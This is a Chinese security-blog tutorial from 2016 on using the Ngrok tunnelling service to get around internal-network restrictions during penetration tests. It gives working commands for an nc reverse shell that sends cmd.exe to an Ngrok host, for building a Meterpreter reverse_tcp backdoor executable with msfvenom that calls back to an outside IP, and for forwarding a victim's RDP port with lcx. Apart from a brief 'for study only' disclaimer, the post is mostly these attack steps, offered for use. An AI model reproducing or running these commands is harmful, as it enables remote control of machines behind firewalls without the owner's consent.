【技术分享】Ngrok内网穿透的几种利用
作者:admin | 时间:2016-9-21 10:06:07 | 分类:黑客技术 隐藏侧边栏展开侧边栏
前言
Ngrok的官方是这样介绍:一条命令解决的外网访问内网问题,本地WEB外网访问、本地开发微信、TCP端口转发。有tcp端口转发的功能,就尝试利用ngrok进行内网的穿透。Ngrok的网址:http://www.ngrok.cc/。
渗透的时候,有时候我们是内网,对方服务器也是内网,而没有vps怎么办,而又想实现端口转发,而这时候可以利用ngrok进行tcp的端口转发,实现内网的穿透。而且支持mac,Linux和windows。
PS:本文具有一定的攻击性,只用于学习,以下实验都是在虚拟机上面实现,还要感谢佳哥的指导。
Ngrok内网穿透的几种利用
首先先到http://www.ngrok.cc/login这个平台登陆进行注册,然后就可以添加自己本地需要转发的地址和接收的端口。
选择需要的服务,填上外网需要接收的端口,和转发到本地的端口和地址,地址可以随意填。
进行nc的反弹
192.168.1.100是kali上面的ip,先选择对应的Linux版本,然后在Linux上面执行这句命令。
1
|
./sunny clientid 客户端id
|
当看到这个界面的时候,就可以进行转发了。
在要接收的Linux机器上面执行这个命令,进行监听:
在内网的机器当中执行这个命令:
1
|
nc -vv server.ngrok.cc 11226 -e c:\Windows\System32\cmd.exe
|
成功接收,有点意思吧。
msf的反弹
当没有一台外网的vps的时候,msf的利用是比较难的。但利用这个可以实现端口的转发。就可以实现即使在内网中也可以玩转msf。用法如下:
先启动服务,kali上面执行这个命令:./sunny clientid 客户端id。http://p6.qhimg.com/t01d4c3fff918b2f55e.png
这里实现的是由外网的端口转发到内网的12345端口当中:server.ngrok.cc(119.28.62.35):11226->192.168.1.102(kali的ip):12345.
先生成一个后门:
1
|
msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=119.28.62.35 LPORT=11226 -f exe x> back.exe
|
然后把后门放在内网的机器上面执行。
在kali上面监听的结果:
成功反弹。
lcx实现的转发
这次是在windows上面启动ngrok,所以选择相应的版本,先执行《Sunny-Ngrok启动工具.bat》,再输入客户端id:
当看到以下界面就说明成功运行:
首先本地进行监听:
1
|
lcx -listen 12345 33891
|
然后将内网的3389转发出去,执行以下命令:
1
|
lcx.exe -slave server.ngrok.cc 11226 127.0.0.1 3389
|
然后用访问本地33891端口进行连接:
成功连接机器。
除了以上的方法,因为实现了端口转发,想利用的方式还是很多的,利用ssh端口的利用等。这里就不举例子了,自己可以尝试实现。
本文由 安全客 原创发布,作者:Double8